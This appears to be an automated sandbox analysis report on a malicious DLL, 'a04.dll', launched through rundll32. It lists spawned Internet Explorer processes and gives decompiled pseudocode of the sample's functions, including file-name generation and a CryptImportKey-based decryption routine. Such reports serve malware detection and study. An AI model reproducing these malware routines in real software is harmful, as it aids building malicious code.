                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Start time:15:51:32
                                                                                                                                                                                                                                                                                  Start date:07/10/2021
                                                                                                                                                                                                                                                                                  Path:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                  Commandline:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  Imagebase:0x7ff731bb0000
                                                                                                                                                                                                                                                                                  File size:823560 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Start time:15:51:34
                                                                                                                                                                                                                                                                                  Start date:07/10/2021
                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:rundll32.exe C:\Users\user\Desktop\a04.dll,DllRegisterServer
                                                                                                                                                                                                                                                                                  Imagebase:0x11d0000
                                                                                                                                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Start time:15:51:34
                                                                                                                                                                                                                                                                                  Start date:07/10/2021
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:17410 /prefetch:2
                                                                                                                                                                                                                                                                                  Imagebase:0x190000
                                                                                                                                                                                                                                                                                  File size:822536 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Start time:15:53:05
                                                                                                                                                                                                                                                                                  Start date:07/10/2021
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:82960 /prefetch:2
                                                                                                                                                                                                                                                                                  Imagebase:0x190000
                                                                                                                                                                                                                                                                                  File size:822536 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Start time:15:53:27
                                                                                                                                                                                                                                                                                  Start date:07/10/2021
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:17424 /prefetch:2
                                                                                                                                                                                                                                                                                  Imagebase:0x190000
                                                                                                                                                                                                                                                                                  File size:822536 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Start time:15:53:31
                                                                                                                                                                                                                                                                                  Start date:07/10/2021
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:17432 /prefetch:2
                                                                                                                                                                                                                                                                                  Imagebase:0x190000
                                                                                                                                                                                                                                                                                  File size:822536 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                  Start time:15:54:03
                                                                                                                                                                                                                                                                                  Start date:07/10/2021
                                                                                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                  Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2792 CREDAT:82984 /prefetch:2
                                                                                                                                                                                                                                                                                  Imagebase:0x190000
                                                                                                                                                                                                                                                                                  File size:822536 bytes
                                                                                                                                                                                                                                                                                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                                                                                  Code Analysis

                                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                                                                    			E00FC4E9C(signed char* __eax, intOrPtr* _a4) {
                                                                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                                                                    				CHAR* _v20;
                                                                                                                                                                                                                                                                                    				struct _FILETIME _v28;
                                                                                                                                                                                                                                                                                    				void* _v32;
                                                                                                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                                                                                                    				char* _v40;
                                                                                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                                                                                    				long _v344;
                                                                                                                                                                                                                                                                                    				struct _WIN32_FIND_DATAA _v368;
                                                                                                                                                                                                                                                                                    				signed int _t72;
                                                                                                                                                                                                                                                                                    				void* _t74;
                                                                                                                                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                                                                                                    				intOrPtr _t81;
                                                                                                                                                                                                                                                                                    				CHAR* _t83;
                                                                                                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                                                                                                    				signed char _t89;
                                                                                                                                                                                                                                                                                    				signed char _t91;
                                                                                                                                                                                                                                                                                    				intOrPtr _t93;
                                                                                                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                                                                                                    				long _t99;
                                                                                                                                                                                                                                                                                    				int _t101;
                                                                                                                                                                                                                                                                                    				signed int _t109;
                                                                                                                                                                                                                                                                                    				char* _t111;
                                                                                                                                                                                                                                                                                    				void* _t113;
                                                                                                                                                                                                                                                                                    				int _t119;
                                                                                                                                                                                                                                                                                    				char _t128;
                                                                                                                                                                                                                                                                                    				void* _t134;
                                                                                                                                                                                                                                                                                    				signed int _t136;
                                                                                                                                                                                                                                                                                    				char* _t139;
                                                                                                                                                                                                                                                                                    				signed int _t140;
                                                                                                                                                                                                                                                                                    				char* _t141;
                                                                                                                                                                                                                                                                                    				char* _t146;
                                                                                                                                                                                                                                                                                    				signed char* _t148;
                                                                                                                                                                                                                                                                                    				int _t151;
                                                                                                                                                                                                                                                                                    				void* _t152;
                                                                                                                                                                                                                                                                                    				void* _t153;
                                                                                                                                                                                                                                                                                    				void* _t154;
                                                                                                                                                                                                                                                                                    				void* _t165;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                                                                    				_t148 = __eax;
                                                                                                                                                                                                                                                                                    				_t72 =  *0xfca2cc; // 0x63699bc3
                                                                                                                                                                                                                                                                                    				_t74 = RtlAllocateHeap( *0xfca290, 0, _t72 ^ 0x63699ac7);
                                                                                                                                                                                                                                                                                    				_v20 = _t74;
                                                                                                                                                                                                                                                                                    				if(_t74 == 0) {
                                                                                                                                                                                                                                                                                    					L36:
                                                                                                                                                                                                                                                                                    					return _v12;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t76 =  *0xfca2cc; // 0x63699bc3
                                                                                                                                                                                                                                                                                    				_t78 = RtlAllocateHeap( *0xfca290, 0, _t76 ^ 0x63699bce);
                                                                                                                                                                                                                                                                                    				_t146 = 0;
                                                                                                                                                                                                                                                                                    				_v36 = _t78;
                                                                                                                                                                                                                                                                                    				if(_t78 == 0) {
                                                                                                                                                                                                                                                                                    					L35:
                                                                                                                                                                                                                                                                                    					HeapFree( *0xfca290, _t146, _v20);
                                                                                                                                                                                                                                                                                    					goto L36;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t136 =  *0xfca2cc; // 0x63699bc3
                                                                                                                                                                                                                                                                                    				memset(_t78, 0, _t136 ^ 0x63699bce);
                                                                                                                                                                                                                                                                                    				_t81 =  *0xfca2d0; // 0x292d5a8
                                                                                                                                                                                                                                                                                    				_t154 = _t153 + 0xc;
                                                                                                                                                                                                                                                                                    				_t5 = _t81 + 0xfcb825; // 0x73797325
                                                                                                                                                                                                                                                                                    				_t83 = E00FC1000(_t5);
                                                                                                                                                                                                                                                                                    				_v20 = _t83;
                                                                                                                                                                                                                                                                                    				if(_t83 == 0) {
                                                                                                                                                                                                                                                                                    					L34:
                                                                                                                                                                                                                                                                                    					HeapFree( *0xfca290, _t146, _v36);
                                                                                                                                                                                                                                                                                    					goto L35;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t134 = 0xffffffffffffffff;
	_v28.dwLowDateTime = 0x63699bce;
	_v28.dwHighDateTime = 0x63699bce;
	_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
	_v32 = _t85;
	if(_t85 != 0x63699bce) {
		GetFileTime(_t85,  &_v28, 0, 0);
		_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
		asm("adc dword [ebp-0x14], 0xc9");
		CloseHandle(_v32);
	}
	 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
	_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
	_t91 = 0x3c6ef35f + _t89 * 0x19660d;
	 *_t148 = _t91;
	_v32 = _t91 & 0x000000ff;
	_t93 =  *0xfca2d0; // 0x292d5a8
	_t16 = _t93 + 0xfcb846; // 0x642e2a5c
	_v40 = _t146;
	_v44 = _t89 & 0x000000ff;
	__imp__(_v20, _t16);
	_t96 = FindFirstFileA(_v20,  &_v368); // executed
	_v16 = _t96;
	if(_t96 == _t134) {
		_t146 = 0;
		goto L34;
	}
	_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
	while(_t99 > 0) {
		_t101 = FindNextFileA(_v16,  &_v368); // executed
		if(_t101 == 0) {
			FindClose(_v16);
			_v16 = FindFirstFileA(_v20,  &_v368);
			_v28.dwHighDateTime = _v344;
			_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
		}
		_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
	}
	_v12 = _v12 & 0x00000000;
	while(1) {
		_t109 = _v44;
		if(_v12 <= _t109) {
			goto L15;
		}
		_t140 = _v12;
		if(_t140 > _v32) {
			_t141 = _v36;
			 *_a4 = _t141;
			while(1) {
				_t128 =  *_t141;
				if(_t128 == 0) {
					break;
				}
				if(_t128 < 0x30) {
					 *_t141 = _t128 + 0x20;
				}
				_t141 = _t141 + 1;
			}
			_v12 = 1;
			FindClose(_v16); // executed
			_t146 = 0;
			goto L35;
		}
		_t165 = _t140 - _t109;
		L15:
		if(_t165 == 0 || _v12 == _v32) {
			_t111 = StrChrA( &(_v368.cFileName), 0x2e);
			_t139 = _v40;
			_t151 = _t111 -  &(_v368.cFileName);
			_t113 = 0;
			if(_t139 != 0) {
				_t48 = _t151 - 4; // -4
				_t113 = _t48;
				if(_t113 > _t151) {
					_t113 = 0;
				}
			}
			if(_t151 > 4) {
				_t151 = 4;
			}
			memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
			_t154 = _t154 + 0xc;
			_v40 =  &(_v40[_t151]);
		}
		do {
			_t119 = FindNextFileA(_v16,  &_v368); // executed
			if(_t119 == 0) {
				FindClose(_v16);
				_v16 = FindFirstFileA(_v20,  &_v368);
			}
		} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
		_v12 = _v12 + 1;
	}
}
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc512d
                                                                                                                                                                                                                                                                                    0x00fc4f37
                                                                                                                                                                                                                                                                                    0x00fc4f3b
                                                                                                                                                                                                                                                                                    0x00fc4f3e
                                                                                                                                                                                                                                                                                    0x00fc4f41
                                                                                                                                                                                                                                                                                    0x00fc4f49
                                                                                                                                                                                                                                                                                    0x00fc4f4c
                                                                                                                                                                                                                                                                                    0x00fc4f55
                                                                                                                                                                                                                                                                                    0x00fc4f5b
                                                                                                                                                                                                                                                                                    0x00fc4f65
                                                                                                                                                                                                                                                                                    0x00fc4f6c
                                                                                                                                                                                                                                                                                    0x00fc4f6c
                                                                                                                                                                                                                                                                                    0x00fc4f7e
                                                                                                                                                                                                                                                                                    0x00fc4f89
                                                                                                                                                                                                                                                                                    0x00fc4f97
                                                                                                                                                                                                                                                                                    0x00fc4f9c
                                                                                                                                                                                                                                                                                    0x00fc4fa1
                                                                                                                                                                                                                                                                                    0x00fc4fa4
                                                                                                                                                                                                                                                                                    0x00fc4fa9
                                                                                                                                                                                                                                                                                    0x00fc4fb3
                                                                                                                                                                                                                                                                                    0x00fc4fb6
                                                                                                                                                                                                                                                                                    0x00fc4fb9
                                                                                                                                                                                                                                                                                    0x00fc4fcf
                                                                                                                                                                                                                                                                                    0x00fc4fd3
                                                                                                                                                                                                                                                                                    0x00fc4fd6
                                                                                                                                                                                                                                                                                    0x00fc5121
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc5121
                                                                                                                                                                                                                                                                                    0x00fc4fed
                                                                                                                                                                                                                                                                                    0x00fc503e
                                                                                                                                                                                                                                                                                    0x00fc5001
                                                                                                                                                                                                                                                                                    0x00fc5009
                                                                                                                                                                                                                                                                                    0x00fc500e
                                                                                                                                                                                                                                                                                    0x00fc501c
                                                                                                                                                                                                                                                                                    0x00fc5025
                                                                                                                                                                                                                                                                                    0x00fc502e
                                                                                                                                                                                                                                                                                    0x00fc502e
                                                                                                                                                                                                                                                                                    0x00fc503c
                                                                                                                                                                                                                                                                                    0x00fc503c
                                                                                                                                                                                                                                                                                    0x00fc5042
                                                                                                                                                                                                                                                                                    0x00fc5046
                                                                                                                                                                                                                                                                                    0x00fc5046
                                                                                                                                                                                                                                                                                    0x00fc504c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc504e
                                                                                                                                                                                                                                                                                    0x00fc5054
                                                                                                                                                                                                                                                                                    0x00fc50fb
                                                                                                                                                                                                                                                                                    0x00fc50fe
                                                                                                                                                                                                                                                                                    0x00fc510b
                                                                                                                                                                                                                                                                                    0x00fc510b
                                                                                                                                                                                                                                                                                    0x00fc510f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc5104
                                                                                                                                                                                                                                                                                    0x00fc5108
                                                                                                                                                                                                                                                                                    0x00fc5108
                                                                                                                                                                                                                                                                                    0x00fc510a
                                                                                                                                                                                                                                                                                    0x00fc510a
                                                                                                                                                                                                                                                                                    0x00fc5114
                                                                                                                                                                                                                                                                                    0x00fc511b
                                                                                                                                                                                                                                                                                    0x00fc511d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc511d
                                                                                                                                                                                                                                                                                    0x00fc505a
                                                                                                                                                                                                                                                                                    0x00fc505c
                                                                                                                                                                                                                                                                                    0x00fc505c
                                                                                                                                                                                                                                                                                    0x00fc506f
                                                                                                                                                                                                                                                                                    0x00fc5075
                                                                                                                                                                                                                                                                                    0x00fc5080
                                                                                                                                                                                                                                                                                    0x00fc5082
                                                                                                                                                                                                                                                                                    0x00fc5086
                                                                                                                                                                                                                                                                                    0x00fc5088
                                                                                                                                                                                                                                                                                    0x00fc5088
                                                                                                                                                                                                                                                                                    0x00fc508d
                                                                                                                                                                                                                                                                                    0x00fc508f
                                                                                                                                                                                                                                                                                    0x00fc508f
                                                                                                                                                                                                                                                                                    0x00fc508d
                                                                                                                                                                                                                                                                                    0x00fc5094
                                                                                                                                                                                                                                                                                    0x00fc5098
                                                                                                                                                                                                                                                                                    0x00fc5098
                                                                                                                                                                                                                                                                                    0x00fc50a8
                                                                                                                                                                                                                                                                                    0x00fc50ad
                                                                                                                                                                                                                                                                                    0x00fc50b0
                                                                                                                                                                                                                                                                                    0x00fc50b0
                                                                                                                                                                                                                                                                                    0x00fc50b3
                                                                                                                                                                                                                                                                                    0x00fc50bd
                                                                                                                                                                                                                                                                                    0x00fc50c5
                                                                                                                                                                                                                                                                                    0x00fc50ca
                                                                                                                                                                                                                                                                                    0x00fc50d8
                                                                                                                                                                                                                                                                                    0x00fc50d8
                                                                                                                                                                                                                                                                                    0x00fc50ec
                                                                                                                                                                                                                                                                                    0x00fc50f0
                                                                                                                                                                                                                                                                                    0x00fc50f0

APIs
• RtlAllocateHeap.NTDLL(00000000,63699BC3,00FCA380), ref: 00FC4EC7
• RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00FC4EE9
• memset.NTDLL ref: 00FC4F03
  • Part of subcall function 00FC1000: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,63699BCE,00FC4F1C,73797325), ref: 00FC1011
  • Part of subcall function 00FC1000: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00FC102B
• CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00FC4F41
• GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00FC4F55
• CloseHandle.KERNEL32(?), ref: 00FC4F6C
• StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00FC4F78
• lstrcat.KERNEL32(?,642E2A5C), ref: 00FC4FB9
• FindFirstFileA.KERNELBASE(?,?), ref: 00FC4FCF
• CompareFileTime.KERNEL32(?,?), ref: 00FC4FED
• FindNextFileA.KERNELBASE(00FC3EAC,?), ref: 00FC5001
• FindClose.KERNEL32(00FC3EAC), ref: 00FC500E
                                                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00FC501A
                                                                                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?), ref: 00FC503C
                                                                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(?,0000002E), ref: 00FC506F
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00FC2779,?,00000000), ref: 00FC50A8
                                                                                                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(00FC3EAC,?), ref: 00FC50BD
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00FC3EAC), ref: 00FC50CA
                                                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00FC50D6
                                                                                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?), ref: 00FC50E6
                                                                                                                                                                                                                                                                                    • FindClose.KERNELBASE(00FC3EAC), ref: 00FC511B
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00FC2779,73797325), ref: 00FC512D
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 00FC513D
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$CreateHandlelstrcatmemcpymemset
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 455834338-0
                                                                                                                                                                                                                                                                                    • Opcode ID: d4eadf44513ba898fa1185b2f3dcaf2dae01e073be40b666c3705d4e1b7d8c90
                                                                                                                                                                                                                                                                                    • Instruction ID: 33d03c70835aef8c99fc0632d1304a398df9e8d292bc8b9f7bd8de6347203db2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4eadf44513ba898fa1185b2f3dcaf2dae01e073be40b666c3705d4e1b7d8c90
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FA812871D0011EAFDB119FA5DE8AFEEBBB9FB44710F14006AE505E3150D771AA84EBA0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                                                                                                    			E00FC35A1(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                                                                                                    				long* _v12;
                                                                                                                                                                                                                                                                                    				int _v16;
                                                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                                                    				long* _v24;
                                                                                                                                                                                                                                                                                    				void* _v39;
                                                                                                                                                                                                                                                                                    				char _v40;
                                                                                                                                                                                                                                                                                    				void _v56;
                                                                                                                                                                                                                                                                                    				int _v60;
                                                                                                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                                                                                                    				void _v67;
                                                                                                                                                                                                                                                                                    				char _v68;
                                                                                                                                                                                                                                                                                    				void* _t61;
                                                                                                                                                                                                                                                                                    				int _t68;
                                                                                                                                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                                                                                                                                    				int _t79;
                                                                                                                                                                                                                                                                                    				int _t81;
                                                                                                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                                                                                                    				long _t86;
                                                                                                                                                                                                                                                                                    				int _t90;
                                                                                                                                                                                                                                                                                    				signed int _t94;
                                                                                                                                                                                                                                                                                    				int _t101;
                                                                                                                                                                                                                                                                                    				void* _t102;
                                                                                                                                                                                                                                                                                    				int _t103;
                                                                                                                                                                                                                                                                                    				void* _t104;
                                                                                                                                                                                                                                                                                    				void* _t105;
                                                                                                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t103 = __eax;
                                                                                                                                                                                                                                                                                    				_t94 = 6;
                                                                                                                                                                                                                                                                                    				_v68 = 0;
                                                                                                                                                                                                                                                                                    				memset( &_v67, 0, _t94 << 2);
                                                                                                                                                                                                                                                                                    				_t105 = _t104 + 0xc;
                                                                                                                                                                                                                                                                                    				asm("stosw");
                                                                                                                                                                                                                                                                                    				asm("stosb");
                                                                                                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                                                                    				asm("stosw");
                                                                                                                                                                                                                                                                                    				asm("stosb");
                                                                                                                                                                                                                                                                                    				_t61 =  *0xfca0b8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                                                                                                                                                                                                                                                                                    				if(_t61 == 0) {
                                                                                                                                                                                                                                                                                    					_a8 = GetLastError();
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					_t101 = 0x10;
                                                                                                                                                                                                                                                                                    					memcpy( &_v56, _a8, _t101);
                                                                                                                                                                                                                                                                                    					_t106 = _t105 + 0xc;
                                                                                                                                                                                                                                                                                    					_v60 = _t101;
                                                                                                                                                                                                                                                                                    					_v67 = 2;
                                                                                                                                                                                                                                                                                    					_v64 = 0x660e;
                                                                                                                                                                                                                                                                                    					_v68 = 8;
                                                                                                                                                                                                                                                                                    					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
                                                                                                                                                                                                                                                                                    					if(_t68 == 0) {
                                                                                                                                                                                                                                                                                    						_a8 = GetLastError();
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                                                                                                    						_push( &_v40);
                                                                                                                                                                                                                                                                                    						_push(1);
                                                                                                                                                                                                                                                                                    						_push(_v12);
                                                                                                                                                                                                                                                                                    						if( *0xfca0dc() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E00FC5C4E(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 =  *0xfca0d4(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0xfca0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 = _t102 + _t90;
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E00FC2A03(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}

                                                                                                                                                                                                                                                                                    0x00fc36cd
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc36cf
                                                                                                                                                                                                                                                                                    0x00fc36d2
                                                                                                                                                                                                                                                                                    0x00fc36d5
                                                                                                                                                                                                                                                                                    0x00fc36d9
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc36db
                                                                                                                                                                                                                                                                                    0x00fc36ea
                                                                                                                                                                                                                                                                                    0x00fc36f0
                                                                                                                                                                                                                                                                                    0x00fc36f8
                                                                                                                                                                                                                                                                                    0x00fc36f8
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc36d9
                                                                                                                                                                                                                                                                                    0x00fc36dd
                                                                                                                                                                                                                                                                                    0x00fc36e5
                                                                                                                                                                                                                                                                                    0x00fc36e8
                                                                                                                                                                                                                                                                                    0x00fc36ff
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc36e8
                                                                                                                                                                                                                                                                                    0x00fc365f
                                                                                                                                                                                                                                                                                    0x00fc3718
                                                                                                                                                                                                                                                                                    0x00fc371b
                                                                                                                                                                                                                                                                                    0x00fc371b
                                                                                                                                                                                                                                                                                    0x00fc3730
                                                                                                                                                                                                                                                                                    0x00fc3730
                                                                                                                                                                                                                                                                                    0x00fc3748

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00FC1B16,00000001,00FC6301,00000000), ref: 00FC35D9
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00FC1B16,00FC6301,00000010,?,?,?,00FC1B16,00000001,00FC6301,00000000,?,00FC5B47,00000000,00FC6301,?,00000000), ref: 00FC35F2
